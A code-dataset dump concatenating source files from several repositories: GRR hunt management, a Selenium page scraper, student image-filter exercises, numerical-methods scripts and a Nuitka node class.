description="Hunt %s %s" % (hunt_obj.hunt_id, hunt_obj.args.hunt_type),
client_rule_set=hunt_obj.client_rule_set,
hunt_id=hunt_obj.hunt_id)
# Make sure the rule makes sense.
foreman_condition.Validate()
data_store.REL_DB.WriteForemanRule(foreman_condition)
return hunt_obj
def PauseHunt(hunt_id, reason=None):
"""Pauses a hunt with a given id."""
def UpdateFn(h):
if h.hunt_state != h.HuntState.STARTED:
raise OnlyStartedHuntCanBePausedError(h)
h.hunt_state = h.HuntState.PAUSED
if reason is not None:
h.hunt_state_comment = reason
else:
h.hunt_state_comment = None
return h
hunt_obj = data_store.REL_DB.UpdateHuntObject(hunt_id, UpdateFn)
if hunt_obj.hunt_state == hunt_obj.HuntState.PAUSED:
data_store.REL_DB.RemoveForemanRule(hunt_id=hunt_obj.hunt_id)
return hunt_obj
def StopHunt(hunt_id, reason=None):
"""Stops a hunt with a given id."""
def UpdateFn(h):
if h.hunt_state not in [h.HuntState.STARTED, h.HuntState.PAUSED]:
raise OnlyStartedOrPausedHuntCanBeStoppedError(h)
h.hunt_state = h.HuntState.STOPPED
if reason is not None:
h.hunt_state_comment = reason
return h
# If the hunt was not started or paused, the exception from UpdateFn is
# guaranteed to be propagated by UpdateHuntObject implementation.
hunt_obj = data_store.REL_DB.UpdateHuntObject(hunt_id, UpdateFn)
data_store.REL_DB.RemoveForemanRule(hunt_id=hunt_obj.hunt_id)
flows = data_store.REL_DB.ReadHuntFlows(hunt_obj.hunt_id, 0, sys.maxsize)
data_store.REL_DB.UpdateFlows(
[(f.client_id, f.flow_id) for f in flows],
pending_termination=rdf_flow_objects.PendingFlowTermination(
reason="Parent hunt stopped."))
if (reason is not None and
hunt_obj.creator not in aff4_users.GRRUser.SYSTEM_USERS):
notification.Notify(
hunt_obj.creator, rdf_objects.UserNotification.Type.TYPE_HUNT_STOPPED,
reason,
rdf_objects.ObjectReference(
reference_type=rdf_objects.ObjectReference.Type.HUNT,
hunt=rdf_objects.HuntReference(hunt_id=hunt_obj.hunt_id)))
return hunt_obj
def UpdateHunt(hunt_id, client_limit=None, client_rate=None, expiry_time=None):
"""Updates a hunt (it must be paused to be updated)."""
def UpdateFn(hunt_obj):
"""Update callback used by UpdateHuntObject."""
if hunt_obj.hunt_state != hunt_obj.HuntState.PAUSED:
raise OnlyPausedHuntCanBeModifiedError(hunt_obj)
if client_limit is not None:
hunt_obj.client_limit = client_limit
if client_rate is not None:
hunt_obj.client_rate = client_rate
if expiry_time is not None:
hunt_obj.expiry_time = expiry_time
return hunt_obj
return data_store.REL_DB.UpdateHuntObject(hunt_id, UpdateFn)
def StartHuntFlowOnClient(client_id, hunt_id):
"""Starts a flow corresponding to a given hunt on a given client."""
hunt_obj = data_store.REL_DB.ReadHuntObject(hunt_id)
hunt_obj = CompleteHuntIfExpirationTimeReached(hunt_obj)
# There may be a little race between foreman rules being removed and
# foreman scheduling a client on an (already) paused hunt. Making sure
# we don't lose clients in such a race by accepting clients for paused
# hunts.
if hunt_obj.hunt_state not in [
rdf_hunt_objects.Hunt.HuntState.STARTED,
rdf_hunt_objects.Hunt.HuntState.PAUSED
]:
return
if hunt_obj.args.hunt_type == hunt_obj.args.HuntType.STANDARD:
hunt_args = hunt_obj.args.standard
def UpdateFn(h):
# h.num_clients > 0 check ensures that first client will be scheduled
# immediately and not 60.0 / h.client_rate seconds after the hunt is
# started.
if h.client_rate > 0 and h.num_clients > 0:
h.next_client_due = h.next_client_due + 60.0 / h.client_rate
h.num_clients += 1
return h
hunt_obj = data_store.REL_DB.UpdateHuntObject(hunt_id, UpdateFn)
start_at = hunt_obj.next_client_due if hunt_obj.client_rate > 0 else None
flow_cls = registry.FlowRegistry.FlowClassByName(hunt_args.flow_name)
flow_args = hunt_args.flow_args if hunt_args.HasField("flow_args") else None
flow.StartFlow(
client_id=client_id,
creator=hunt_obj.creator,
cpu_limit=hunt_obj.per_client_cpu_limit,
network_bytes_limit=hunt_obj.per_client_network_bytes_limit,
flow_cls=flow_cls,
flow_args=flow_args,
start_at=start_at,
parent_hunt_id=hunt_id)
if hunt_obj.client_limit and hunt_obj.num_clients >= hunt_obj.client_limit:
PauseHunt(hunt_obj.hunt_id)
elif hunt_obj.args.hunt_type == hunt_obj.args.HuntType.VARIABLE:
raise NotImplementedError()
else:
raise UnknownHuntTypeError("Can't determine hunt type when starting "
"hunt %s on client %s." % (client_id, hunt_id))
def GetHuntOutputPluginLogs(hunt_id, offset, count):
"""Gets hunt's output plugins logs."""
# TODO(user): this is a simplistic implementation that may return
# more results than requested. Refactor and improve.
flows = data_store.REL_DB.ReadHuntFlows(
hunt_id,
offset,
count,
filter_condition=db.HuntFlowsCondition.FLOWS_WITH_RESULTS_ONLY)
logs = []
for f in flows:
for op_state in f.output_plugins_states:
logs.extend(op_state.plugin_state["logs"])
return logs
def GetHuntOutputPluginErrors(hunt_id, offset, count):
"""Gets hunt's output plugins errors."""
# TODO(user): this is a simplistic implementation that may return
# more results than requested. Refactor and improve.
flows = data_store.REL_DB.ReadHuntFlows(
hunt_id,
offset,
count,
filter_condition=db.HuntFlowsCondition.FLOWS_WITH_RESULTS_ONLY)
errors = []
for f in flows:
for op_state in f.output_plugins_states:
errors.extend(op_state.plugin_state["errors"])
return errors
```
#### File: grr/test_lib/db_test_lib_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_core.lib import flags
from grr_response_core.lib.util import compatibility
from grr_response_server import data_store
from grr.test_lib import db_test_lib
from grr.test_lib import test_lib
@db_test_lib.DualDBTest
class DualDBTestDecoratorTest(test_lib.GRRBaseTest):
"""Test DualDBTest decorator."""
def _IsDBTest(self):
name = compatibility.GetName(self.__class__)
return name.endswith("_RelationalDBEnabled")
def _IsStableDBTest(self):
name = compatibility.GetName(self.__class__)
return name.endswith("_StableRelationalDBEnabled")
def _Description(self):
if self._IsDBTest() or self._IsStableDBTest():
return "RelationalDB enabled"
else:
return "RelationalDB disabled"
def testRelationalDBReadEnabled(self):
result = data_store.RelationalDBReadEnabled()
self.assertEqual(
result,
self._IsDBTest() or self._IsStableDBTest(),
"RelationalDBReadEnabled() is %s for %s" % (result,
self._Description()))
def testRelationalDBFlowsEnabled(self):
result = data_store.RelationalDBFlowsEnabled()
expected = self._IsDBTest() or self._IsStableDBTest()
self.assertEqual(
result, expected, "RelationalDBFlowsEnabled() is %s for %s" %
(result, compatibility.GetName(self.__class__)))
if __name__ == "__main__":
flags.StartMain(test_lib.main)
```
#### File: grr/test_lib/parser_test_lib_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl.testing import absltest
import mock
from grr_response_core.lib import flags
from grr_response_core.lib import parser
from grr_response_core.lib import parsers
from grr_response_core.lib.parsers import all as all_parsers
from grr.test_lib import parser_test_lib
from grr.test_lib import test_lib
class FooParser(parser.SingleResponseParser):
def ParseResponse(self, knowledge_base, response, path_type):
raise NotImplementedError()
class BarParser(parser.SingleFileParser):
def ParseFile(self, knowledge_base, pathspec, filedesc):
raise NotImplementedError()
class BazParser(parser.SingleFileParser):
def ParseFile(self, knowledge_base, pathspec, filedesc):
raise NotImplementedError()
def SingleResponseParsers():
return parsers.SINGLE_RESPONSE_PARSER_FACTORY.CreateAll()
def SingleFileParsers():
return parsers.SINGLE_FILE_PARSER_FACTORY.CreateAll()
class WithAnnotationTestMixin(object):
# TODO(hanuszczak): This could actually be moved to some base test class.
def assertTypesEqual(self, instances, types):
self.assertCountEqual(map(type, instances), types)
class WithParserTest(WithAnnotationTestMixin, absltest.TestCase):
def testSingleParser(self):
@parser_test_lib.WithParser("Foo", FooParser)
def AssertFooIsRegistered():
self.assertTypesEqual(SingleResponseParsers(), [FooParser])
# By default, no parsers should be registered.
self.assertTypesEqual(SingleResponseParsers(), [])
# This function is annotated and should register defined parsers.
AssertFooIsRegistered()
# Afterwards, the factory should not have any parser registered again.
self.assertTypesEqual(SingleResponseParsers(), [])
def testMultipleParsers(self):
@parser_test_lib.WithParser("Foo", FooParser)
@parser_test_lib.WithParser("Bar", BarParser)
@parser_test_lib.WithParser("Baz", BazParser)
def AssertTestParsersAreRegistered():
self.assertTypesEqual(SingleResponseParsers(), [FooParser])
self.assertTypesEqual(SingleFileParsers(), [BarParser, BazParser])
# Again, by default no parsers should be registered.
self.assertTypesEqual(SingleResponseParsers(), [])
self.assertTypesEqual(SingleFileParsers(), [])
# Every annotation should register corresponding parser.
AssertTestParsersAreRegistered()
# And again, all parsers should leave the clean state again.
self.assertTypesEqual(SingleResponseParsers(), [])
self.assertTypesEqual(SingleFileParsers(), [])
class WithAllParsersTest(WithAnnotationTestMixin, absltest.TestCase):
def testWithCustomRegisterMethod(self):
def Register():
parsers.SINGLE_RESPONSE_PARSER_FACTORY.Register("Foo", FooParser)
parsers.SINGLE_FILE_PARSER_FACTORY.Register("Bar", BarParser)
parsers.SINGLE_FILE_PARSER_FACTORY.Register("Baz", BazParser)
@parser_test_lib.WithAllParsers
def AssertAllTestParsersAreRegistered():
self.assertTypesEqual(SingleResponseParsers(), [FooParser])
self.assertTypesEqual(SingleFileParsers(), [BarParser, BazParser])
with mock.patch.object(all_parsers, "Register", Register):
self.assertTypesEqual(SingleResponseParsers(), [])
self.assertTypesEqual(SingleFileParsers(), [])
AssertAllTestParsersAreRegistered()
self.assertTypesEqual(SingleResponseParsers(), [])
self.assertTypesEqual(SingleFileParsers(), [])
if __name__ == "__main__":
flags.StartMain(test_lib.main)
``` |
{
"source": "4nif/py-project-template",
"score": 3
} |
#### File: py-project-template/pyproject/pyproject.py
```python
import sys
def main(args):
"""
Main command-line function.
"""
print(args)
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "4nm1tsu/uncompressor",
"score": 3
} |
#### File: uncompressor/uncompressor/main.py
```python
import click
from . import compressed
from . import uncompress
@click.command()
@click.argument('srcs', type=click.Path(exists=True), nargs=-1)
@click.option('--dist', '-d', default='', help='An optional directory to which extract files.')
def uncmprs(srcs, dist):
if dist:
compressed.Compressed.dist = dist
with click.progressbar(srcs) as bar:
for src in bar:
file = compressed.Compressed(src)
if file.is_available():
# 解凍処理
uncompress.uncompress(file)
else:
click.secho('{file} is not a valid type'.format(file=file.path), fg='red')
def main():
uncmprs()
if __name__ == '__main__':
main()
``` |
{
"source": "4nth0nySLT/PyScraperHTML",
"score": 2
} |
#### File: 4nth0nySLT/PyScraperHTML/scraper.py
```python
from selenium.webdriver import Chrome
import time
from random import randrange
import os, subprocess,zipfile,io
import requests
from glob import glob
def actualizar():
proc=subprocess.run('cmd /c dir /B/AD "'+str(glob("c:\\*\\Google\\Chrome\\Application\\")[0])+'" | findstr /R /C:"^[0-9].*\\..*[0-9]$"',stdout=subprocess.PIPE, stderr=subprocess.PIPE)
version= proc.stdout.decode().split('\r')[0]
try:
resp=requests.get('https://chromedriver.storage.googleapis.com/LATEST_RELEASE_'+'.'.join(version.split('.')[:3]))
resp=requests.get('https://chromedriver.storage.googleapis.com/'+resp.text+'/chromedriver_win32.zip')
zipF = zipfile.ZipFile(io.BytesIO(resp.content))
try:
os.remove('chromedriver.exe')
except:
try:
os.rename('chromedriver.exe','chromedriverold.exe')
except:
try:
os.rename('chromedriver.exe','borrameANTHONY'+str(time.time()))
except:
pass
zipF.extractall()
res=True
try:
os.remove('chromedriverold.exe')
for i in glob("borrameANTHONY*"):
os.remove(i)
except:
pass
except Exception as e:
print(e)
res=False
return res
def navegador(url="https://google.com"):
try:
session=Chrome()
except:
ver=actualizar()
if ver==True:
session=Chrome()
else:
print("Error")
return "error"
try:
session.get(url)
except:
session.get("https://google.com")
memoria=""
while 1:
try:
html=session.find_element_by_tag_name("html").get_attribute('outerHTML')
if html!=memoria:
filename=session.title
filename="".join([c for c in filename if c.isalpha() or c.isdigit() or c==' ']).rstrip()
try:
os.mkdir(filename)
except:
pass
filename='./'+filename+"/"+filename+"_"+str(int(time.time()))+str(randrange(1000,9999))+".html"
with open(filename,"ab") as file:
file.write(html.encode())
memoria=html
else:
time.sleep(1)
except Exception as e:
print(e)
pass
url=input("Url: ")
if url=="":
navegador()
navegador(url)
``` |
{
"source": "4ntLu0/1051-Project",
"score": 4
} |
#### File: 1051-Project/Milestone1/L2_5_P2_contrast.py
```python
from Cimpl import *
image = load_image(choose_file()) # loads the desired image from a given file
show(image) # displays the image to the user
image1 = copy(image) #creates a copy of the image so it is not overrided when the new image is returned
def extreme_contrast(image: Image) -> Image:
""" Using a given image, the this function alters the r, g and b components to create a new contrasted image.
Written by <NAME>.
>>> extreme_contrast(IMAGE)
IMAGE comes out with all pixels being extremely contrasted.
<Cimpl.Image object at 0x00000278831087B8>
"""
for x, y, (r, g, b) in image1:
if 0 < r < 127:
r = 0
else:
r = 255
if 0 < g < 127:
g = 0
else:
g = 255
if 0 < b < 127:
b = 0
else:
b = 255
set_color(image1, x, y, create_color(r, g, b))
show(image1)
return image1
```
#### File: 1051-Project/Milestone2/L2_5_P4_test_extreme.py
```python
from L2_5_P4_extreme import extreme_contrast
from Cimpl import create_color, set_color, save_as, show, load_image, Image,\
choose_file, copy
"""
CODE ATTRIBUTED FROM FILES ON CULEARN
test function that reviews the code for the contrasting filter to see if the /
pixels are properly
analyzed, if the original image changes and if the image has been contrasted
HOW TO RUN CODE
Run the file
pixels of chosen image are analyzed and a contrasted version of the
image will appear
END OF CODE
written by Emilio: 101143244
"""
def test_extreme():
image = load_image( choose_file ( ) ) # Loads a file that you choose
for x, y, (r, g, b) in image:
print('this pixel has been analyzed correctly')
else:
print('this pixel has not been analyzed correctly')
if image == extreme_contrast(image):
print('the image contrast has: PASSED THE TEST')
else:
print('the image contrast has: FAILED THE TEST')
if __name__ == '__main__':
test_extreme()
```
#### File: 1051-Project/Milestone2/L2_5_p5_test_vertical.py
```python
from Cimpl import *
image = load_image(choose_file())
def flip_vertical(image: image) -> Image:
vertical_image = copy(image)
for x in range(get_width(image)):
for y in range(get_height(image)):
flipped_color = get_color(image, -x, y)
set_color(vertical_image, x, y, flipped_color)
show(vertical_image)
return vertical_image
def test_flip_vertical(image: Image) -> Image:
""" Writen by <NAME> (101147742). Function tests that all values of the x axis of the inputted image (into the flip_vertical function) are assigned to to their negative counterparts"""
vertical_image = flip_vertical(image)
for x in range(get_width(image)):
for y in range(get_height(image)):
original_colour = get_color(image, x, y)
for x in range(get_width(vertical_image)):
for y in range(get_height(vertical_image)):
vertical_colour = get_color(vertical_image, -x, y)
if original_colour == vertical_colour:
print('Test Passed')
else: print('Test Failed')
```
#### File: 1051-Project/Milestone2/L2_5_P5_vertical.py
```python
from Cimpl import show, copy, get_height, get_width,create_color, \
set_color, load_image, choose_file, create_image
def flip_vertical(img):
"""
A photo is displayed. The function is called and the rgb values for each /
pixel is printed. ...
ex:
photo facing left is inserted
photo facing right is returned
'Written by <NAME>: 101143244'
DOCSTRING TESTING (what the function does)
Code is run
File explorer appears and an image can be selected
The height and width of this image is recorded and the rgb values for each
pixel are changed
New flipped image is returned with changed applied to it
Close the new image
END OF CODE
CODE HAS BEEN ATTRIBUTED FROM GIVEN FILES FOUND ON CULEARN
"""
show(img)
image = copy(img) #Creates the copy to prevent it from/
#Being overwritten
h= get_height(image) #Interprets the height of the image
w = get_width(image) #Interprets the width of the image
new_image = create_image( w, h ) #Creates an image with the same values/
#As h,w
#(Essentially creating an image of the/
#Same dimensions)
for pixel in image: #Examines all pixels in the new image
x,y,(r,g,b) = pixel
#Print(r,g,b) #Prints the r g b values of every pixel
new_color = create_color(r,g,b)
set_color(new_image, w - x - 1 , y - 1 , new_color)
show(new_image)
return new_image
#Adjust pixels along x axis(width of image) ex: one pixel has a particular/
#Distance from one edge of the image, to flip the image, the pixel's distance/
#From the edge is now the same distance but from the other edge
if __name__ == '__main__':
new_image = load_image(choose_file())
flip_vertical(new_image)
```
#### File: 1051-Project/Milestone2/L2_5_three_tone.py
```python
from Utils.Cimpl import load_image, choose_file, show, set_color, save_as, create_color, get_width, get_height # change
# this later please
from Utils.simple_Cimpl_filters import grayscale
from typing import NewType, List
#import numpy as np
Image = NewType('Image', str)
from datetime import datetime
tones = {'black' : (0, 0, 0), 'white': (255, 255, 255), 'red': (255, 0, 0), 'lime': (0, 255, 0), 'blue': (0, 0, 255),
'yellow': (255, 255, 0), 'cyan': (0, 255, 255), 'magenta': (255, 0, 255), 'gray': (128, 128, 128)}
brightness = []
def threeTone( image: Image, col1: str, col2: str, col3: str , show = False, txt = True) -> Image:
""" Returns an image with three tones, with the darkest being the first tone, and brightest being the third tone.
Written by <NAME>.
:param image:
:type image:
:param col1:
:type col1:
:param col2:
:type col2:
:param col3:
:type col3:
:return:
:rtype:
"""
if txt:
tone1r, tone1g, tone1b = tones[col1]
tone2r, tone2g, tone2b = tones[col2]
tone3r, tone3g, tone3b = tones[col3]
else:
tone1r, tone1g, tone1b = col1
tone2r, tone2g, tone2b = col2
tone3r, tone3g, tone3b = col3
tone1 = create_color(tone1r, tone1g, tone1b)
tone2 = create_color(tone2r, tone2g, tone2b)
tone3 = create_color(tone3r, tone3g, tone3b)
for x, y, (r, g, b) in image:
avg = (r + g + b) / 3
if avg < 84:
set_color(image, x, y, tone1)
elif avg <= 170:
set_color(image, x, y, tone2)
else:
set_color(image, x, y, tone3)
if show:
show(image)
return image
if __name__ == '__main__':
image = load_image(choose_file())
print('image loaded, starting conversion')
save_as(threeTone(image, 'white', 'gray', 'black'), 'returns/three_tone.jpg')
print('conversion finished.')
if input(' would you like to view the image? [Y/N]') == 'Y':
show(image)
else:
print('ok, exiting code. byebye!')
```
#### File: Milestone2/Utils/L2-5-P2-green.py
```python
from Cimpl import *
image = load_image('p2-original.jpg') # loads the desired image from a given file
def green_filter( image1: Image ) -> Image:
"""Given an image from a selected file, the function sets all the pixels in the image to the color green and saves it as a new image.
<NAME> """
image = copy(image1) # creates a copy of the image so it is not overrided once the new image is created
show(image)
for x, y, (r, g, b) in image: # reads through each pixel in the image
green = create_color(0, g, 0)
set_color(image, x, y, green) # sets all the pixels of defined locations in that image to the color green
save_as(image, 'green_channel.png') # saves the image
show(load_image('green_channel.png'))
print('green_channel saved as new image')
return image1
def test_green() -> None:
''' Test function for green filter that tests if all the pixels in the image have been changed to green.
Written by <NAME>.
>>> test_green()
'''
image1 = green_filter(image)
for x, y, (r, g, b) in image1:
if r == 0 and b == 0: # checks that all of the pixels are green, and not blue nor red
print("PASS")
return
else:
print("FAIL") # Fails if there are pixels of the color red or blue
return
```
#### File: Milestone2/Utils/postereinesog.py
```python
from Cimpl import *
# adjustment function, Author: <NAME> S# 101144277
def _adjust_component(r, g , b) -> tuple:
"""
Author: <NAME> S# 101144277
Returns an image but filtered to posterize:
Examples:
>>> posterize('p2-original.jpg')
sets all the pixels in the file in posterize
"""
r2 = 0
g2 = 0
b2 = 0
if r <= 63 and r > 0:
r2 = 32
elif r <= 127 and r > 64:
r2 = 96
elif r <= 191 and r > 128:
r2 = 160
elif r <= 255 and r > 192:
r2 = 224
if g <= 63 and g > 0:
g2 = 32
elif g <= 127 and g > 64:
g2 = 96
elif g <= 191 and g > 128:
g2 = 160
elif g <= 255 and g > 192:
g2 = 224
if b <= 63 and b > 0:
b2 = 32
elif b <= 127 and b > 64:
b2 = 96
elif b <= 191 and b > 128:
b2 = 160
elif b <= 255 and b > 192:
b2 = 224
return r2,g2,b2
# posterize function, Author: <NAME> S# 101144277
def posterize(file: str)-> Image:
"""
Author: <NAME> S# 101144277
Returns an image but filtered to posterize:
Examples:
>>> posterize('p2-original.jpg')
sets all the pixels in the file in posterize
"""
image = load_image(file)
posterize_image = copy(image)
for x, y, (r, g, b) in image:
adjustColor = _adjust_component(r,g,b)
r2 , g2 , b2 = adjustColor
red = create_color(r2 ,g2 ,b2)
set_color(posterize_image, x, y, red)
return posterize_image
```
#### File: 4ntLu0/1051-Project/simple_Cimpl_filters.py
```python
from Cimpl import choose_file, load_image, copy, create_color, set_color,\
show, Image, get_color
def invert(image: Image) -> Image:
"""Return an inverted copy of image; that is, an image that is a colour
negative of the original image.
>>> image = load_image(choose_file())
>>> inverted = invert(image)
>>> show(inverted)
"""
new_image = copy(image)
# Invert the intensities of every component in every pixel.
for x, y, (r, g, b) in image:
inverted = create_color(255 - r, 255 - g, 255 - b)
set_color(new_image, x, y, inverted)
return new_image
# Image processing filters that create grayscale images from a colour image.
def grayscale_from_red(image: Image) -> Image:
"""Return a grayscale copy of image. Each pixel's red component provides
the RGB components for the corresponding gray shade.
>>> image = load_image(choose_file())
>>> gray_image = grayscale_from_red(image)
>>> show(gray_image)
"""
new_image = copy(image)
for x, y, (r, g, b) in image:
gray = create_color(r, r, r)
set_color(new_image, x, y, gray)
return new_image
def grayscale_from_green(image: Image) -> Image:
"""Return a grayscale copy of image. Each pixel's green component provides
the RGB components for the corresponding gray shade.
>>> image = load_image(choose_file())
>>> gray_image = grayscale_from_green(image)
>>> show(gray_image)
"""
new_image = copy(image)
for x, y, (r, g, b) in image:
gray = create_color(g, g, g)
set_color(new_image, x, y, gray)
return new_image
def grayscale_from_blue(image: Image) -> Image:
"""Return a grayscale copy of image. Each pixel's blue component provides
the RGB components for the corresponding gray shade.
>>> image = load_image(choose_file())
>>> gray_image = grayscale_from_blue(image)
>>> show(gray_image)
"""
new_image = copy(image)
for x, y, (r, g, b) in image:
gray = create_color(b, b, b)
set_color(new_image, x, y, gray)
return new_image
def grayscale(image: Image) -> Image:
"""Return a grayscale copy of image.
>>> image = load_image(choose_file())
>>> gray_image = grayscale(image)
>>> show(gray_image)
"""
new_image = copy(image)
for x, y, (r, g, b) in image:
# Use the pixel's brightness as the value of RGB components for the
# shade of gray. These means that the pixel's original colour and the
# corresponding gray shade will have approximately the same brightness.
brightness = (r + g + b) // 3
# or, brightness = (r + g + b) / 3
# create_color will convert an argument of type float to an int
gray = create_color(brightness, brightness, brightness)
set_color(new_image, x, y, gray)
return new_image
def test_grayscale() -> None:
'''Start of a test function for grayscale.
Tests if the first few pixels are shades of gray.
>>> test_grayscale()
'''
image = load_image('riveter.jpg')
gray_image = grayscale(image)
# Check if pixel @ (0, 0) is gray.
r, g, b = get_color(gray_image, 0, 0)
if r != g or g != b:
print('FAIL: Pixel @ (0, 0), r =', r, 'g =', g, 'b =', b)
return
# Check pixel @ (1, 0) is gray.
r, g, b = get_color(gray_image, 1, 0)
if r != g or g != b:
print('FAIL: Pixel @ (1, 0), r =', r, 'g =', g, 'b =', b)
return
# Check pixel @ (2, 0) is gray.
r, g, b = get_color(gray_image, 2, 0)
if r != g or g != b:
print('FAIL: Pixel @ (2, 0), r =', r, 'g =', g, 'b =', b)
return
print('PASS')
# Exercise 1 (easy):
# How can we modify test_grayscale so that it visits every pixel in the image,
# checking if each one is a shade of gray?
#
# Exercise 2 (more challenging)
# How can we modify test_grayscale so that it visits every pixel in the image,
# checking if grayscale calculated the correct shade of gray for the pixel?
``` |
{
"source": "4ntongC/Scientific-Computing-MATH-GA-2043",
"score": 3
} |
#### File: Scientific Computing Projects (Code Parts)/2/Numeric_Integration.py
```python
from scipy import integrate
class m:
def __init__(this, f):
this.f = f
def RR1f(a, b, n, m):
ans = 0;
delta = (b - a) / n #length of each interval
x = a - delta
for i in range(n):
x += delta
ans += m.f(x)*delta
return ans
def MR2f(a, b, n, m):
ans = 0
delta = (b - a) / n
x = a - delta / 2
for i in range(n):
x += delta
ans += m.f(x)*delta
return ans
def RR1a(a, b, n0, m, tol):
accu = integrate.quad(m.f, a, b)[0]
approx = RR1f(a, b, n0, m)
err = abs(accu - approx)
n_max = 1000000
while err / accu > tol:
n0 *= 2
approx = RR1f(a, b, n0, m)
err = abs(accu - approx)
if n0 > n_max:
break
return (approx, n0, n0 <= n_max)
def SR4f(a, b, n, m):
ans = 0
delta = (b - a) / n
x = a - delta
for i in range(n):
x += delta
ans += (m.f(x)+4*m.f(x+delta/2)+m.f(x+delta))*delta/6
return ans
def SR4a(a, b, n0, m, tol):
accu = integrate.quad(m.f, a, b)[0]
approx = SR4f(a, b, n0, m)
err = abs(accu - approx)
n_max = 1000000
while err / accu > tol:
n0 *= 2
approx = SR4f(a, b, n0, m)
err = abs(accu - approx)
if n0 > n_max:
break
return (approx, n0, n0 <= n_max)
```
#### File: 3/Problem 1/MatrixExponential.py
```python
import numpy as np # general numpy
import numpy.linalg as la # linear algebra routines
def mee(L,t): # compute the matrix exponential using eigenvalues
[d,d] = L.shape
lam, R = la.eig(L) # lam = eigenvalues, R = right eigenvectors
d_elamt = np.zeros([d,d]) # diagonal matrix with e^{-lambda_j t}
for j in range(d):
d_elamt[j,j] = np.exp( lam[j]*t)
return( R@[email protected](R), la.cond(d_elamt)) #cond computed using |A||A^-1|
def med(L, t, k): # compute the matrix exponential, differential equation
[d,d] = L.shape
n = 2**k # number of intervals
dt = t/n # time step
I = np.identity(d) # to make the next formula simpler
# S(dt) computed using 4 Taylor series terms in Horner's rule form
S = I + dt*L@( I + (1/2)*dt*L@( I + (1/3)*dt*L@( I + (1/4)*dt*L)))
# Raise this to the power n using repeated doublings S_j = S^{2^j} until j=k
for j in range(k):
S = S@S # S^{2^{j-1}} becomes S^{2^j} when you square it
return( S )
def meT(L,t, n): # compute the matrix exponential using Taylor series
[d,d] = L.shape
tLk = np.identity(d) # will be (tL)^k
kf = 1 # will be k! = k factorial
S = np.identity(d) # will be the answer = sum (1/k!)((tL)^k
max_norm = 0
for k in range(1,n):
kf = k*kf # multiply by k to turn (k-1)! into k!
tLk = t*( (tLk)@L) # turn (k-1)-th power into k-th power(tL)^k,
S += (1/kf)*tLk # (1/k!)(tL)^k is the k-th Taylor series term
max_norm = max(max_norm, la.norm((1/kf)*tLk))
return( S, max_norm )
# Physical parameters
d = 5 # size of the matrix
r_u = 2. # rate of going up: k -: k+1 transition
r_d = 5. # rate of going down: k -> k-1 transition
r_l = (r_u+r_d) # "loss rate" = rate to leave state k
t = 3. # time: Compute exp(tL)
# Computational parameters
n_T = 100 # number of Taylor series terms
k = 11 # n = 2^k intervals for Runge Kutta, dt = t/n
# The generator matrix L, with up rate on the super-diagonal
# and down rate on the sub-diagonal.
L = np.zeros([d,d])
for i in range(1,d):
L[ i ,i-1] = r_d
L[i-1, i ] = r_u
L[ 0 , 0 ] = - r_u
L[d-1,d-1] = - r_d
for i in range(1,d-1):
L[i,i] = -r_l
# Compute S = exp(tL) three ways
Se, cond = mee(L, t)
ST, max_norm = meT(L, t, n_T)
Sd = med(L, t, k)
# The RMS differences between the computed matrices
rms_eT = np.sqrt( np.sum( (Se - ST)**2))
rms_ed = np.sqrt( np.sum( (Se - Sd)**2))
rms_Td = np.sqrt( np.sum( (ST - Sd)**2))
# Formatted output
print("\nRMS differences between computed matrix exponentials\n")
runInfo = "up rate = {r_u:8.1f}, down rate = {r_d:8.1f}, dimension is {d:3d}\n"
runInfo = runInfo.format( r_u = r_u, r_d = r_d, d = d)
print( runInfo )
eT_info = "eigenvalue vs. Taylor series: {rms_eT:14.6e}, \
with {c:8.1e} condition number, {m:8.1e} and {n:4d} terms"
ed_info = "eigenvalue vs. RungeKutta: {rms_ed:14.6e}, \
with k = {k:2d}"
Td_info = "Runge Kutta vs. Taylor series: {rms_Td:14.6e}"
eT_info = eT_info.format( rms_eT = rms_eT, c = cond, m = max_norm, n = n_T)
ed_info = ed_info.format( rms_ed = rms_ed, k = k)
Td_info = Td_info.format( rms_Td = rms_Td)
print( eT_info)
print( ed_info)
print( Td_info)
```
#### File: 3/Problem 3/ReadParticleData.py
```python
import numpy as np # general numpy
SourcePointsFile = "SourcePoints.txt"
TargetPointsFile = "TargetPoints.txt"
# Source points
def read():
inFile = open( SourcePointsFile, "r") # open the source points file
firstLine = inFile.readline() # the first line has the number of points
nPoints = int(firstLine) # convert the number from string to int
sourcePoints = np.zeros([nPoints,3]) # the source points array
for p in range(nPoints):
dataLine = inFile.readline() # there is one point per line
words = dataLine.split() # each word is a number
x = np.float64(words[0]) # x, y, and z coordinates
y = np.float64(words[1]) # convert from string to float
z = np.float64(words[2])
sourcePoints[p,0] = x # save the numbers in the numpy array
sourcePoints[p,1] = y
sourcePoints[p,2] = z
inFile.close()
# target points
inFile = open( TargetPointsFile, "r") # open the source points file
firstLine = inFile.readline() # the first line has the number of points
nPoints = int(firstLine) # convert the number from string to int
targetPoints = np.zeros([nPoints,3]) # the source points array
for p in range(nPoints):
dataLine = inFile.readline() # there is one point per line
words = dataLine.split() # each word is a number
x = np.float64(words[0]) # x, y, and z coordinates
y = np.float64(words[1]) # convert from string to float
z = np.float64(words[2])
targetPoints[p,0] = x # save the numbers in the numpy array
targetPoints[p,1] = y
targetPoints[p,2] = z
inFile.close()
return sourcePoints, targetPoints
``` |
{
"source": "4O4/Nuitka",
"score": 2
} |
#### File: nuitka/nodes/BuiltinIntegerNodes.py
```python
from nuitka.__past__ import long # pylint: disable=I0021,redefined-builtin
from nuitka.PythonVersions import python_version
from nuitka.specs import BuiltinParameterSpecs
from .ConstantRefNodes import makeConstantRefNode
from .ExpressionBases import (
ExpressionChildrenHavingBase,
ExpressionSpecBasedComputationBase
)
from .shapes.BuiltinTypeShapes import (
ShapeTypeIntOrLong,
ShapeTypeIntOrLongDerived,
ShapeTypeLong,
ShapeTypeLongDerived
)
class ExpressionBuiltinInt1(ExpressionChildrenHavingBase):
kind = "EXPRESSION_BUILTIN_INT1"
named_children = ("value",)
def __init__(self, value, source_ref):
ExpressionChildrenHavingBase.__init__(
self,
values = {
"value" : value
},
source_ref = source_ref
)
def getTypeShape(self):
# TODO: Depending on input type shape and value, we should improve this.
return ShapeTypeIntOrLongDerived
def computeExpression(self, trace_collection):
value = self.getValue()
return value.computeExpressionInt(
int_node = self,
trace_collection = trace_collection
)
getValue = ExpressionChildrenHavingBase.childGetter("value")
